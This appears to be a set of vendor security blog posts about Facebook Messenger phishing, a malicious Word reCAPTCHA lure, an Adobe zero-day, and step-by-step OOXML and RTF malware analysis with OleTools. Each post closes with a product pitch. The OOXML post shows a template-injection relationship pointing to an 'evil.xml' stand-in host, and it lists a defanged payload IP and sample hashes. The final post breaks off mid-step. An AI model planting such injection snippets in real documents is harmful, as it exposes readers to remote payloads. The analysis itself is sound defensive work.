Target: IT Professionals

Tags: Malware, Phishing, Zero-Trust, Isolation

Cybercriminals have tapped into a vast network of fabricated and breached Facebook profiles, unleashing millions of deceptive Messenger messages aimed at Facebook business accounts, embedding password-theft malware [1].

The malefactors craftily deceive the recipients into downloading an archive (either in RAR or ZIP format), which includes a downloader for a cunning Python-based program designed to
extract stored cookies and passwords from the user’s browser.

The initial approach these criminals take is to send deceptive Messenger messages to business accounts on Facebook. These messages masquerade as copyright infringement notifications
or product information inquiries. An attached archive, when executed, retrieves a malware installer from GitHub repositories, cleverly bypassing detection mechanisms and leaving minimal footprints.

This attached archive not only delivers the payload (termed project.py) but also procures a standalone Python environment essential for the malware’s information theft activities.
For sustained malicious activity, it ensures the malware launches during system startup.

With a sophisticated design, the project.py file is layered with five stages of obfuscation, making it especially tricky for anti-virus systems to identify and neutralize the threat.

Guardio Labs has shed light on the staggering magnitude of this campaign, noting its vast reach. Their analysis reveals that 7% of all business accounts on Facebook have been in the
crosshairs, with about 0.4% succumbing to the temptation and downloading the malevolent archive.

However, it is important to note that for the malware to spring into action, users must execute the batch file. The exact count of compromised accounts remains a mystery, but given
the scale, it is conceivable the numbers are substantial.

What can we do?

The answer is rooted not in detecting the new attack variation but in its prevention. This is why we created BUFFERZONE® Safe Workspace™.

BUFFERZONE Safe Workspace™ is a comprehensive defense suite anchored in application isolation technology. This arsenal features the Safe Browser, SafeBridge® (boasting Content Disarm and Reconstruction functions), Safe Mail, and Safe Removable (geared towards thwarting USB-based attacks), all fortified with clipboard security. At its core, the Safe Workspace™ deploys a virtual container constructed by a kernel driver. This container bifurcates the operating system into dual logical realms:

Trusted Zone: A non-isolated region connected to the organization’s resources.

Untrusted Zone: Serving as a protective buffer, this zone enables various applications to operate in isolation, cordoned off from the memory, files, registry, and processes of the trusted zone.

Safe Workspace™ is a reliable solution that allows users to access USB (Universal Serial Bus) files, email attachments, and downloaded content. It provides a protective virtual container that isolates potential threats from the broader environment, ensuring that malware cannot reach or compromise sensitive organizational data. The virtual container is periodically deleted and rebuilt; detection engines can scrutinize it for added security. By containing potential threats in isolation, BUFFERZONE prevents malicious entities from proliferating within an organization.

By isolating the browser, all downloaded files are contained, the extracted files are not authorized to run, and the evasive attack will fail. BUFFERZONE® let third party detection scan the virtual isolated container. If part of the attack is detected the file can be quarantined and the environment can be cleaned in a few seconds.

References 

[1] Bill Toulas, Facebook Messenger phishing wave targets 100K business accounts per week  

https://www.bleepingcomputer.com/news/security/facebook-messenger-phishing-wave-targets-100k-business-accounts-per-week/

Target: IT Professionals

Tags: Anti-phishing, malware, isolation, Zero-trust

Research from Fortinet FortiGuard Labs [1] found a new variation of phishing/luring attacks that work by sending a Microsoft Office OOXML (Office Open XML) file. The file presents a deliberately blurred image and a counterfeit reCAPTCHA to lure the recipient into clicking on it. The Lure image [1,2] Clicking activates an embedded malicious link in the file “\word_rels\document.xml.rels,” as shown in Figure.1

Figure 1. present the relations file named document.xml.rels. We can see that the TragetMode is External, and the target link contains a website with an executable as a resource.

As a result, the attack download, and executable initiate a chain of steps [1] in which three malware are downloaded. The problem starts with the low detection rate. After two days after the first submission, the detection rate was 15/62 engines. This is a significant red alert that although detection solutions are significant for endpoint protection, they are not enough. The solution is advanced prevention based on application isolation.

How to Prevent New Malware Attacks?

Attackers currently have the advantage of being able to test their modified attacks against a wide range of security solutions before launching them. This gives them a significant edge, making it clear that relying solely on detection is insufficient.

The answer is rooted not in detecting new attack variations but in its prevention. This is why we created BUFFERZONE® Safe Workspace™.

BUFFERZONE Safe Workspace™ is a comprehensive defense suite anchored in application isolation technology. This arsenal features the Safe Browser, SafeBridge® (boasting Content Disarm and Reconstruction functions), Safe Mail, and Safe Removable (geared towards thwarting USB-based attacks), all fortified with clipboard security. At its core, the Safe Workspace™ deploys a virtual container constructed by a kernel driver. This container bifurcates the operating system into dual logical realms:

Trusted Zone: A non-isolated region connected to the organization’s resources.

Untrusted Zone: Serving as a protective buffer, this zone enables various applications to run in isolation, cordoned off from the memory, files, registry, and processes of the trusted zone.

Safe Workspace™ is a reliable solution that allows users to access USB (Universal Serial Bus) files, email attachments, and downloaded content. It provides a protective virtual container that isolates potential threats from the broader environment, ensuring that malware cannot reach or compromise sensitive organizational data. The virtual container is periodically deleted and rebuilt; detection engines can scrutinize it for added security. By containing potential threats in isolation, BUFFERZONE prevents malicious entities from proliferating within an organization.

The answer is rooted not in detecting the zero-day attack but in its prevention. This is why we created BUFFERZONE® Safe Workspace™.

BUFFERZONE Safe Workspace™ is a comprehensive defense suite anchored in application isolation technology. This arsenal features the Safe Browser, SafeBridge® (boasting Content Disarm and Reconstruction functions), Safe Mail, and Safe Removable (geared towards thwarting USB-based attacks), all fortified with clipboard security. At its core, the Safe Workspace™ deploys a virtual container constructed by a kernel driver. This container bifurcates the operating system into dual logical realms:

Trusted Zone: A non-isolated region connected to the organization’s resources.

Untrusted Zone: Serving as a protective buffer, this zone enables various applications to operate in isolation, cordoned off from the memory, files, registry, and processes of the trusted zone.

Safe Workspace™ is a reliable solution that allows users to access USB files, email attachments, and downloaded content. It provides a protective virtual container that isolates potential threats from the broader environment, ensuring that malware cannot reach or compromise sensitive organizational data. The virtual container is periodically deleted and rebuilt; detection engines can scrutinize it for added security. By containing potential threats in isolation, BUFFERZONE prevents malicious entities from proliferating within an organization.

References

[1] Cara Lin, OriginBotnet Spreads via Malicious Word Document

, OriginBotnet Spreads via Malicious Word Document | FortiGuard Labs (fortinet.com)

[2] The Hacker News, Sophisticated Phishing Campaign Deploying Agent Tesla, OriginBotnet, and RedLine Clipper, https://thehackernews.com/2023/09/sophisticated-phishing-campaign.html

Target: IT Professionals

Tags: Malware, Vulnerability, Zero-Trust, CVE-2023-26369, Isolation

Adobe has released security updates to address a zero-day vulnerability in Acrobat and Reader, identified as actively exploited in the wild. Though the full scope of these attacks has yet to be disclosed [1], it has been confirmed that the vulnerability affects both Windows and macOS platforms [2].

Interestingly, this vulnerability is easily exploitable by attackers, yet it does not require high-level system permissions. It is, however, confined to local attacks and demands user interaction, as described in its CVSS v3.1 assessment. Adobe has tagged this flaw with the identifier CVE-2023-26369, marking it with the highest urgency. They strongly advise system administrators to install the updates promptly.

It is worth noting that cyber adversaries often target Adobe Portable Document Format (PDF) readers due to the adaptability of the file format and the widespread use of PDF files. Case in point, CVE-2021-21017 leveraged a buffer overflow [3]. This attack happens when a process’s memory area, designed to house dynamic variables (the heap), becomes overloaded. Should a buffer overflow arise, the impacted software typically malfunctions. In the case of this specific vulnerability, it paved the way for attackers to run arbitrary code on compromised systems. Other vulnerabilities in Adobe were exploited successfully in the past.

How to Prevent New Zero-Day Attacks?

A zero-day attack capitalizes on a software vulnerability that remains unknown to those who could remedy it, notably the software’s vendor. Since the flaw remains undisclosed, neither the software users nor its vendor has time to prepare against “zero days” attacks. Once the exploit becomes recognized, it is assigned a CVE number.

The pressing question arises: How can one shield against an unseen threat?

The answer is rooted not in detecting the zero-day attack but in its prevention. This is why we created BUFFERZONE® Safe Workspace™.

BUFFERZONE Safe Workspace™ is a comprehensive defense suite anchored in application isolation technology. This arsenal features the Safe Browser, SafeBridge® (boasting Content Disarm and Reconstruction functions), Safe Mail, and Safe Removable (geared towards thwarting USB-based attacks), all fortified with clipboard security. At its core, the Safe Workspace™ deploys a virtual container constructed by a kernel driver. This container bifurcates the operating system into dual logical realms:

Trusted Zone: A non-isolated region connected to the organization’s resources.

Untrusted Zone: Serving as a protective buffer, this zone enables various applications to operate in isolation, cordoned off from the memory, files, registry, and processes of the trusted zone.

Safe Workspace™ is a reliable solution that allows users to access USB files, email attachments, and downloaded content. It provides a protective virtual container that isolates potential threats from the broader environment, ensuring that malware cannot reach or compromise sensitive organizational data. The virtual container is periodically deleted and rebuilt; detection engines can scrutinize it for added security. By containing potential threats in isolation, BUFFERZONE prevents malicious entities from proliferating within an organization.

References

[1] Sergiu Gatlan, Adobe warns of critical Acrobat and Reader zero-day exploited in attacks, https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-acrobat-and-reader-zero-day-exploited-in-attacks/

[2] Adobe Security Bulletin, https://helpx.adobe.com/security/products/acrobat/apsb23-34.html

[3] Lindsey O’Donnell , Attackers Exploit Critical Adobe Flaw to Target Windows Users, https://threatpost.com/google-chrome-zero-day-windows-mac/163688/

Target: Cybersecurity specialist

Tags: OOXML, Word, PowerPoint, Excell, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering, Zero-Trust.

Microsoft Office Open XML (OOXML) used from the 2007 version of Office documents onward. OOXML is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word-processing documents. The file format is used by extensions xlsx, docx, pptx, and other variants [2]. It is the successor to the Object Linking and Embedding (OLE) file format (Blog), which employs compound files instead of XML files to store content. Both OOXML and OLE files are interchangeable and can be saved as one another. The ECMA International standardized the initial version as ECMA-376. ISO and IEC standardized later versions as ISO/IEC 29500 [1].

Hackers exploit Microsoft OOXML for several reasons:

• It is widely used by Microsoft Office, the most popular office suite in the world, and OOXML is the default file format for Microsoft Office 2007 and later versions (including Office 365). This means that many people use OOXML files, making them a target for hackers.
• OOXML is a complex file format, which makes it difficult to secure. There are many diverse ways to exploit OOXML files, and it can be difficult for security researchers to keep up with all the new vulnerabilities discovered. Known vulnerabilities are modified and used in the wild for a long time.
• OOXML is an open standard that is freely available to anyone. This makes it easier for hackers to find and exploit vulnerabilities in OOXML files.

OOXML File-Format

The file is a ZIP archive containing XML files organized into a package, and the data type of each part is specified in a manifest file called [Content_Types].xml which is a critical part of the OOXML file format and used by applications to read and write OOXML files.

It lists all the parts in the file and their relationships.

• Rels: The .rels section in an OOXML file is a manifest file that lists the relationships between the parts of the file. Each relationship specifies the source part, the target part, and the type of relationship. The .rels section is typically located in the _rels folder of the OOXML file.

• The first relationship (rId1) specifies that the source part (word/document.xml) contains the target part (office Document).
• The second relationship (rId2) specifies that the source part (word/document.xml) references the target part (theme/theme1.xml).
• The third relationship (rId3) specifies that the source part (word/document.xml) references the target part (styles.xml).

The .rels section is a critical part of the OOXML file format. It allows applications to read and write OOXML files by providing information about the relationships between the parts of the file.

• docprops: the section in a Microsoft OOXML file is a container for document properties. Document properties are metadata about the document, such as the author, the title, the creation date, and the modification date.

The docprops section is typically located in the docprops folder of the OOXML file. The docProps folder is a hidden folder containing additional files used by the               OOXML file format.

The core.xml that is found in the docprops includes information about the document author:

• Author: The name of the author of the document.
• Title: The title of the document.
• Subject: The subject of the document.
• Keywords: A list of keywords that describe the document.
• Creation date: The date and time that the document was created.
• Last modification date: The date and time that the document was last modified.
• Company: The name of the company that created the document.
• Manager: The name of the manager who approved the document.
• Comments: Any comments about the document.
• Template: The name of the template that was used to create the document.

• CustomXML : The CustomXML  section in a Microsoft OOXML file is a container for custom XML parts. Custom XML parts are XML documents that can be stored in an OOXML file. They can be used to store arbitrary data, such as custom properties, user-defined tags, or even entire documents.

The CustomXML contains:

• The CustomXML Part element specifies the ID, name, and content of the custom XML part.
• The Id attribute specifies the unique identifier of the custom XML part.
• The Name attribute specifies the name of the custom XML part.
• The content element specifies the content of the custom XML part.

The CustomXML can store:

• Custom properties: Custom properties can be used to store arbitrary data about a document.
• User-defined tags: User-defined tags can be used to add custom formatting to a document.
• Entire documents: Entire documents can be stored in a CustomXML section, this enables storing templates or other documents that are referenced by the main document.

• Word: The word section in a Microsoft OOXML file is used to store the main content of the document. It contains the text, formatting, and other elements that make up the document. The word section is typically located in the word folder of the OOXML file. The word folder is a subfolder of the root folder.
  The word section is a critical part of the OOXML file format. It contains the document’s main content, which makes the document readable.

The Word section contains:

• Text: The text element is used to store the actual text of the document.
• Formatting: The pPr element stores the formatting of the text, such as the font, size, and color.
• Styles: The pStyle attribute is used to store the style of the paragraph.
• Objects: Objects like images and tables can also be stored in a word section.

Attacking The Format

Microsoft Office files are common attack vectors for spreading malware, with a continuous but slow increase in OOXML-based malware since 2015. There are several methods employed by malicious actors to exploit OOXML files:

·       RELS: Template injection: By adding a new relationship to the rels file, we open new attack possibilities, for example, the following:

<Relationship Id=”rId3″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml” Target=”customXml.xml”> <TargetMode>External</TargetMode> <TargetURI>http://example.com/evil.xml</TargetURI> </Relationship>
The target can be a remote URI or a local file.

• VBA Macros: Like OLE malware attacks that used Lure images to convince users to enable macros.
• Embedding of OLE Objects: OOXML allows the embedding of OLE (Object Linking and Embedding) objects within an OOXML file. These OLE objects are created with programs supporting Microsoft’s OLE technology, such as Microsoft Word. Malicious actors can exploit vulnerabilities in OLE objects. For example, the OOXML file format permits the embedding of OLE objects, which can be manipulated by hackers to execute remote code.
• General XML Vulnerabilities: While not specific to OOXML, XML vulnerabilities can potentially impact OOXML files since they are XML-based. An example of this is XML External Entity (XXE) attacks, where a weakly configured XML parser can be exploited to lead to various system impacts, such as the disclosure of confidential data, denial of service, server-side request forgery, and more. XXE attacks can involve external resource inclusion style attacks, which can disclose local files containing sensitive information or enable CSRF attacks on unprotected internal services [5].

Malware Investigation Research Steps:

Investigating OOXML malware requires a careful and systematic approach. Below are highly suggested steps we conduct in our research:

1. Isolation: Always work in a safe environment when dealing with potential malware. This usually means using a sandbox or a dedicated, isolated system that is not connected to your network. In this blog, we will work inside Ubuntu Virtual Machine.
2. Collection: The first step is gathering potentially malicious OOXML files. These can be sourced from various locations like spam emails, and suspicious websites, or shared through threat intelligence feeds. We will use MalwareBazaar [6], a public malware repository, to receive interesting malware for analysis.
3. Static Analysis: Start by examining the OOXML without executing it. This includes viewing the file metadata, the structure, the embedded objects, scripts, or unusual elements. In this blog, we will use the OleTools suite [7], and we will use OleVBA and OleObj, Yara static engine signature [8], malware signatures from ditekshen detection Yara signatures [9].
4. Dynamic Analysis: This involves monitoring the behavior of the OOXML file when it is opened. You would typically use a sandbox environment for this, which can safely log the actions of the file, such as network connections, file system modifications, or registry changes. Many evasive behaviors are discovered during dynamic analysis that can highlight behavior that we missed during the static analysis or are unfamiliar with. This part will be outside of this blog’s focus.
5. Payload Extraction: If the OOXML has an embedded payload, this will need to be extracted for further analysis. This could be another file, a script, or something else. Payload extraction can be done as part of the static analysis or part of the dynamic analysis features.
6. Code Analysis: If the OOXML includes embedded or obfuscated code, such as OLE objects or PowerShell, this must be analyzed. This involves de-obfuscating the code, understanding its functionality, and identifying any potential exploits or vulnerabilities it might use. This will be done as part of our static analysis investigation.
7. Threat Intelligence Correlation: Correlate the information collected about the OLE malware with threat intelligence data. This can give information on the possible threat actors, campaigns, their methods, or whether this malware has been observed before. This step is done after the collection and during the static and dynamic analysis. When we discover Information of Compromise (IOC), a list of drop file (sha256 /MD5 hash representation), URLs, and IP addresses in the file, we can enhance our understanding of the file capabilities based on threat intelligence.
8. Reporting: Finally, document your findings. This report should detail the characteristics of the malware, how it works, its impact, and recommended mitigation strategies.

Remember to stay safe when investigating potential malware, and only do so in a controlled and isolated environment. It is essential to keep systems and software up to date to protect against known vulnerabilities that malware often exploits. This tutorial is for educational purposes only. Please take full responsibility while handling dangerous malicious files.

OOXML Research

In this blog, we will investigate sha256:  812f20d2efdf9807d425cb63ea737d4bbc4774af375dbc6d3164b913c450b1be

Threat Intelligence:

The first stage will be reviewing the file in VirusTotal to get reputation and information about the file. We can observe that the file is related to Follina CVE-2022-30190, a vulnerability in Microsoft Support Diagnostic Tool (MSDT). The adversaries behind this exploit hosted the Follina exploit in an external public-facing URL. This URL was injected into the document with an exploit marker “!” at the end of the URL to trigger the exploit template. Although the exploit is from 2022, the detection rate, as we can observe in VirusTotal, is relatively low, 40/65.

Dynamic Analysis:

From viewing the file in an OPSWAT FileScan.IO emulation sandbox environment (Link ), we can observe that winword.exe opened Iexplorer.exe and downloaded: http://45[.]67[.]229[.]164:[7497]/payload.html

This is evidence of malicious activity since the file downloads an “HTML” file and uses a fixed IP address instead of a defined domain. This is abnormal behavior usually exhibited by malware authors.

Now let’s review it from the static analysis point of view.

Static Analysis:

To begin our analysis, we will use a script called Oleid, which is part of the OleTools library. We can observe that Oleid detected External Relationships.

It is also interesting to see the document’s structure after unzipping since the location of Rel’s section is inside the Word section and not in the first hierarchy, but this behavior is allowed in OOXML.

From OleId, we can understand that there are no VBA or XLM macros. We verified this is the case by calling olevba <file>:

By running OleObj, we can observe it detected an external relation with the IP we saw in the dynamic analysis.

Content Disarm, and Reconstruction (CDR) technology is a great solution to counter this. CDR removes any suspicious attack vectors, whether they are malicious or not.

After using BUFFERZONE SafeBridge™ CDR technology, we observed that the solution safely removed the exploit. This is the output from the OleId results showing that the external relationships are now secure:

Our next blog post will continue to delve into the OOXML file format attacks, present new attack vectors, and how we can remediate them.

References

[1] ISO/IEC 29500-1:2016, Information technology — Document description and processing languages — Office Open XML File Formats — Part 1: Fundamentals and Markup Language Reference, https://www.iso.org/standard/71691.html

[2] Open XML Formats and file name extensions, https://support.microsoft.com/en-us/office/open-xml-formats-and-file-name-extensions-5200d93c-3449-4380-8e11-31ef14555b18

[3] Ionut Ilascu, New Technique Recycles Exploit Chain to Keep Antivirus Silent, https://www.bleepingcomputer.com/news/security/new-technique-recycles-exploit-chain-to-keep-antivirus-silent/

[4] Template Injection, https://attack.mitre.org/techniques/T1221/

[5] OWSAP, XML External Entity (XXE) Processing, https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

[6] MalwareBazaar, Public malware repository, https://bazaar.abuse.ch/

[7] ] OleTools, https://github.com/decalage2/oletools

[8] Yara, the pattern-matching Swiss knife for malware researchers, https://virustotal.github.io/yara/

[9] Ditekshen, Yara signatures, https://github.com/ditekshen/detection.

[10] Sergiu Gatlan, Microsoft patches actively exploited Follina Windows zero-day,  https://www.bleepingcomputer.com/news/security/microsoft-patches-actively-exploited-follina-

Target: Cybersecurity specialist

Tags: RTF, Word, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering, Zero-Trust.

In this second blog post we will focus on RTF file analysis with RTFOBJ from OLETOOLS [2] and use md5 command and “file” command to verify drop file content. For more information about RTF file structure please review the first part of this series (Link) and detailed research focusing on RTF Content Disarm and Reconstruction (CDR) [1].

Malware Investigation Research Steps:

Investigating RTF malware requires a careful and systematic approach. Below are highly suggested steps we conduct in our research:

1. Isolation: Always work in a safe environment when dealing with potential malware. This usually means using a sandbox or a dedicated, isolated system that is not connected to your network. In this blog, we will work inside Ubuntu Virtual Machine.
2. Collection: The first step is gathering potentially malicious RTF files. These can be sourced from various locations like spam emails, and suspicious websites, or shared through threat intelligence feeds. We will use MalwareBazaar [4], a public malware repository, to receive interesting malware for analysis.
3. Static Analysis: Start by examining the RTF without executing it. This includes viewing the file metadata, the structure, the embedded objects, scripts, or unusual elements. In this blog, we will use the OleTools suite [2] and we will use RTFOBJ, Yara static engine signature [3], malware signatures from ditekshen detection Yara signatures [4].
4. Dynamic Analysis: This involves monitoring the behavior of the RTF file when it is opened. You would typically use a sandbox environment for this, which can safely log the actions of the file, such as network connections, file system modifications, or registry changes. Many evasive behaviors are discovered during dynamic analysis that can highlight behavior that we missed during the static analysis or are unfamiliar with. This part will be outside of this blog’s focus.
5. Payload Extraction: If the RTF has an embedded payload, this will need to be extracted for further analysis. This could be another file, a script, or something else. Payload extraction can be done as part of the static analysis or part of the dynamic analysis features.
6. Code Analysis: If the RTF includes embedded or obfuscated code, such as OLE (Object Linking and Embedding) objects or PowerShell, this must be analyzed. This involves de-obfuscating the code, understanding its functionality, and identifying any potential exploits or vulnerabilities it might use. This will be done as part of our static analysis investigation.
7. Threat Intelligence Correlation: Correlate the information collected about the OLE malware with threat intelligence data. This can give information on the possible threat actors, campaigns, their methods, or whether this malware has been observed before. This step is done after the collection and during the static and dynamic analysis. When we discover Information of Compromise (IOC) which are a list of drop file (sha256 /MD5 hash representation), URL’s, IP addresses in the file, we can enhance our understanding of the file capabilities based on threat intelligence.
8. Reporting: Finally, document your findings. This report should detail the characteristics of the malware, how it works, its impact, and recommended mitigation strategies.

Remember always to stay safe when investigating potential malware, and only do so in a controlled and isolated environment. It is important to keep systems and software up to date to protect against known vulnerabilities that malware often exploits. This tutorial is for educational purposes only. Please take full responsibility while handling dangerous malicious files.

RTF Research

In this blog, we will investigate sha256:  0ea61e3db99c96cf0b148d6f2ebab3ed8860c17be0298a7e5469330b0eecb7d7

Threat Intelligence:

The first stage will be reviewing the file in VirusTotal to get reputation and information about the file.

We can observe that the file is detected as malicious by 36 engines, and the popular threat is trojan type: trojan.noon/generickds.

Dynamic Analysis:

Based on VMRAY sandbox environment analysis (Link), it is evident that the attack was triggered by windord.exe employing RPC communication. The malware leveraged the e equation (CVE-2017-11882 [6] exploit), which in turn activated the command line (CMD.exe) executing the dropped DLL. Following this, rundll.exe carried out a process injection attack, progressing the assault.

Now let us research the file from the static point of view.

Static Analysis:

To begin our analysis, we will be using a script called Oleid. This script is designed to thoroughly examine OLE files and identify any unique characteristics that may indicate malicious intent. It can detect the presence of VBA macros and embedded Flash objects. However, Oleid, did not indicate any suspicious activity.

We also ran RTFOBJ on the file and discovered that it contains two problematic OLE objects. The first one is a log file the RTFOBJ knows to extract its true type and indicate that this is a PE or DLL file and not a log file. The second object is ole equation 3.0 that is quite common in today’s attacks although it was initially discovered in 2017 [6] malware authors still Havely use it with different evasive permutations.

To examine the first item, we will utilize RTFOBJ with the parameters “-s 0”. This will save the object to a specified path provided by RTFOBJ. The next step is to execute the Linux file command: file <file_path>. This will reveal the true file format, which in this case is a PE32+ (64 bit) DLL. We can also generate the md5 of the dropped file by running md5 <file_path>. The resulting md5 code for this file is: 998c79456d9782eb1a03140e04f36d46.

Now let us search the md5 in VirusTotal:

We can observe that the DLL file is detected by 42 engines, and it is classified as trojan.noon/formbook malware.

In this installment, we explore RTFOBJ as a research tool, an alternative to the rtfdump.py we discussed in our last post. However, diving into RTF malware research can be complicated. Malware creators frequently employ clever evasion techniques, which can sidestep basic static analysis and file parsing. These techniques often go unnoticed by the RTF reader during its operation. To tackle and identify such deceptions, we recommend using Yara signatures [8], as we have highlighted before.

Content Disarm and Reconstruction (CDR) technology emerges as a robust countermeasure. CDR diligently strips away potential attack vectors, regardless of their malicious intent.

Stay tuned: Our upcoming post will further explore RTF file format threats and demonstrate how CDR acts as a formidable line of defense.

References

[1] Ran Dubin, “Content Disarm and Reconstruction of RTF Files a Zero File Trust Methodology,” in IEEE Transactions on Information Forensics and Security, vol. 18, pp. 1461-1472, 2023, doi: 10.1109/TIFS.2023.3241480.

[2] OleTools, https://github.com/decalage2/oletools

[3] Yara, the pattern matching Swiss knife for malware researchers, https://virustotal.github.io/yara/

[4] Ditekshen, Yara signatures, https://github.com/ditekshen/detection.

[5] Didier Stevens, rtfdump, https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py

[6] CVE-2017-11882, https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11882

[7] Decalage, RTF evasion tricks, https://decalage.info/rtf_tricks

[8] Inquest, Inquest Yara rules for Virus Total, https://github.com/InQuest/yara-rules-vt

Target: Cybersecurity specialist

Tags: RTF, Word, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering, Zero-Trust.

The Rich Text Format (RTF) is a file format that enables the exchange of text files between different word processors across varying operating systems [1]. It’s encoded using the American Standard Code for Information Interchange (ASCII) standard and utilizes control words for formatting the text, such as bold or italic. Control words are processed by an RTF writer and reader that convert the RTF language into formatting for the word processor [1].

However, this plain text file format has a dark side. Microsoft RTF files are increasingly being used by attackers, especially for phishing attacks, due to their ability to embed various exploits. This is primarily because of the Object Linking and Embedding (OLE) feature of RTF files, which is massively abused by attackers to either link the RTF document to external malicious code or to embed other file format exploits within itself [1].

RTF File-Format

An RTF file comprises of ASCII characters to represent rich text, along with non-ASCII characters converted to appropriate code values.

RTF files are made up of the following key components:

• Control Words: These are specially formatted commands that mark characters for display. Each control word begins with a backslash, is case-sensitive, and can contain ASCII Alphabets (a through z and A through Z). A space, a numeric digit or an ASCII minus sign, or any character other than a letter or a digit can denote the end of the control word’s name. Some control words include parameters represented as positive or negative decimal numbers. Control words like \binN, \revdttmN, \rsidN, and \bliptagN can take values in the range of a 32-bit signed integer [1].
• Control Symbols: These represent special occurrences that have specific meaning depending on their contents. They consist of a backslash followed by a special (non-alphabetical) character and do not have any delimiters [1].
• Groups: These are another building block for the representation of RTF data. The RTF documentation does not provide additional detail in this respect [1].

The RTF file format is divided into different sections that denote different properties and types of content:

• Header: The RTF Version and Character Set.
• Document Text
• Destination Text
• Font Table and Font Embedding
• Code Page Support
• File Table
• Color Table
• Style Sheet
• List Table and List Override Table
• Track Changes
• Document Area: This includes Information Group and Document Formatting Properties.
• Section Text: This includes Section Formatting Properties, Headers, and Footers.
• Paragraph Text: This includes Paragraph Formatting Properties, Paragraph Borders and Shading, Bullets and Numbering, and Table Definitions.
• Character Text: This includes Font Formatting Properties, Character Borders and Shading, and Associated Character Properties.
• Special Characters, Document Variables, Bookmarks, Pictures, Objects, and Drawing Objects.
• Footnotes, Comments, Fields, Form Fields, Index Entries, Table of Contents Entries, and Bidirectional Language Support.

The last release of the RTF format, version 1.9.1, was in March 2008, compatible with Word 2007[1]. Despite its legacy, RTF has been losing traction as a primary file format with the introduction of Word 2010 and its lack of support for new features and functionalities of Word. It still serves as a powerful tool for preserving the integrity of document content across different applications and platforms.

Attacking The Format

We encourage you to review the full description of the attack vectors and how to disarm them [1]. It is important to note that the attack vectors do not only focus on exploiting the document features and vulnerabilities that exist that aim to attack the RTF file reader.

The following are few examples for well-known RTF file exploitation: of the file structure:

• Control Words Exploitation: RTF control words define how the document is presented to the user. Since control words have associated parameters and data, parsing errors can become a target for exploitation. Past exploits have been observed using control words to embed malicious resources. Therefore, it is important to examine a destination control word that consumes data and extracts the stream [1].
• Overlay Data Exploitation: Overlay data refers to additional data appended at the end of RTF documents. This data is used by exploit authors to embed decoy files or additional resources, either in clear or encrypted form. For example, the CVE-2015-1641 exploits embedded both decoy documents and multi-staged shellcodes with markers using overlay data [2].
• Object Linking and Embedding Exploitation: RTF files can embed objects created in other applications due to the OLE feature. The embedded or linked objects are represented as RTF objects, with the data for these objects stored as a parameter in the hex encoded OLESaveToStream format. By abusing this feature, attackers can exploit the parsing vulnerabilities or aid further exploitation [2].
• Delivery of Malicious Payloads: Attackers can use RTF files to deliver malicious payloads. For example, an instance of a malicious Word document with a .DOC extension, which was an RTF file, resulted in GET requests delivering a malicious payload upon launch [3].

Malware Investigation Research Steps:

Investigating RTF malware requires a careful and systematic approach. Below are highly suggested steps we conduct in our research:

1. Isolation: Always work in a safe environment when dealing with potential malware. This usually means using a sandbox or a dedicated, isolated system that is not connected to your network. In this blog, we will work inside Ubuntu Virtual Machine.
2. Collection: The first step is gathering potentially malicious RTF files. These can be sourced from various locations like spam emails, and suspicious websites, or shared through threat intelligence feeds. We will use MalwareBazaar [4], a public malware repository, to receive interesting malware for analysis.
3. Static Analysis: Start by examining the RTF without executing it. This includes viewing the file metadata, the structure, the embedded objects, scripts, or unusual elements. In this blog, we will use the OleTools suite [5] and we will use RTFOBJ, Yara static engine signature [6], malware signatures from ditekshen detection Yara signatures [7] and Dider Stevens rtfdump tool to parse and dump different file sections [8].
4. Dynamic Analysis: This involves monitoring the behavior of the RTF file when it is opened. You would typically use a sandbox environment for this, which can safely log the actions of the file, such as network connections, file system modifications, or registry changes. Many evasive behaviors are discovered during dynamic analysis that can highlight behavior that we missed during the static analysis or are unfamiliar with. This part will be outside of this blog’s focus.
5. Payload Extraction: If the RTF has an embedded payload, this will need to be extracted for further analysis. This could be another file, a script, or something else. Payload extraction can be done as part of the static analysis or part of the dynamic analysis features.
6. Code Analysis: If the RTF includes embedded or obfuscated code, such as OLE objects or PowerShell, this must be analyzed. This involves de-obfuscating the code, understanding its functionality, and identifying any potential exploits or vulnerabilities it might use. This will be done as part of our static analysis investigation.
7. Threat Intelligence Correlation: Correlate the information collected about the OLE malware with threat intelligence data. This can give information on the possible threat actors, campaigns, their methods, or whether this malware has been observed before. This step is done after the collection and during the static and dynamic analysis. When we discover Information of Compromise (IOC) which are a list of drop file (sha256 /MD5 hash representation), URL’s, IP addresses in the file, we can enhance our understanding of the file capabilities based on threat intelligence.
8. Reporting: Finally, document your findings. This report should detail the characteristics of the malware, how it works, its impact, and recommended mitigation strategies.

Remember always to stay safe when investigating potential malware, and only do so in a controlled and isolated environment. It is important to keep systems and software up to date to protect against known vulnerabilities that malware often exploits. This tutorial is for educational purposes only. Please take full responsibility while handling dangerous malicious files.

RTF Research

In this blog, we will investigate sha256:  ed248657afc15600a6b8e5b9cfa94203f9bfeda0ebd1a3007356e99836adeddf

Threat Intelligence:

The first stage will be reviewing the file in VirusTotal to get reputation and information about the file.

We can observe that the file is detected as malicious by 32 engines, and the popular threat is trojan type: CVE-2017-11882 or CVE-20178-0802

Dynamic Analysis:

From viewing the file in a VMRAY sandbox environment (Link ):

Based on this sandbox run, the winword.exe executes the equation (CVE-2017-11882 [9]) through RPC and exploits it to download lawserhgj5784.exe from the network. Now, let’s perform a static analysis to achieve the same outcome.

Now let’s review it from the static analysis point of view.

Static Analysis:

To begin our analysis, we will be using a script called Oleid. This script is designed to thoroughly examine OLE files and identify any unique characteristics that may indicate malicious intent. It can detect the presence of VBA macros and embedded Flash objects. Despite our use of Oleid, we did not observe any suspicious activity.

We also ran RTFOBJ on the file and discovered that it contains a “not a well-formed OLE object.” However, this alone is not enough to determine the behavior of the file.

Given the obfuscated nature and the complexity of the file, we’ll employ Yara signatures to enhance our understanding and increase visibility. To gain further insight, we’ll utilize the Yara signatures in conjunction with Ditekshen. The outcome reveals that the Yara signature identifies a detection for CVE-2017-11882.

Using rtfdump.py, we can detect that the equation 3.0 [9] entity is detected in the RTF document in the 4th group level 3 within the file.

If we run:

